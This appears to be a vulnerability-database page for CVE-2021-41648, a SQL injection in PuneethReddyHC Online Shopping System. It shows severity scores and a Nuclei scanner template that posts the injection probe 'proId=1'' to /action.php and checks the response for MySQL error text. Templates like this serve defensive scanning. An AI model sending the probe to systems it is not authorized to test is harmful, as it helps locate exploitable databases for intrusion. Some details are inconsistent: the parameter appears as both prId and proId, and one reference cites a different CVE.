Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-41648
HistoryOct 02, 2021 - 3:16 p.m.

PuneethReddyHC action.php SQL Injection

2021-10-0215:16:40
ProjectDiscovery
github.com
8

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.058 Low

EPSS

Percentile

93.4%

An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.

id: CVE-2021-41648

info:
  name: PuneethReddyHC action.php SQL Injection
  author: daffainfo
  severity: high
  description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/MobiusBinary/CVE-2021-41648
    - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41649
    - http://packetstormsecurity.com/files/165036/PuneethReddyHC-Online-Shopping-System-Advanced-1.0-SQL-Injection.html
    - https://github.com/nu11secur1ty/Windows10Exploits
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41648
    cwe-id: CWE-89
    epss-score: 0.05423
    epss-percentile: 0.93138
    cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: online-shopping-system-advanced_project
    product: online-shopping-system-advanced
  tags: cve2021,cve,sqli,packetstorm,online-shopping-system-advanced_project

http:
  - method: POST
    path:
      - "{{BaseURL}}/action.php"

    body: "proId=1'&addToCart=1"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "Warning: mysqli_num_rows() expects parameter 1 to be"
          - "xdebug-error xe-warning"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009f35b908a21851e0b54903b436548d81ae690de17c6662b9477cc55a382a306c0221008a8017248a597009b54d71672833ef2d493587431bc340d8d889f0819a1db87e:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.058 Low

EPSS

Percentile

93.4%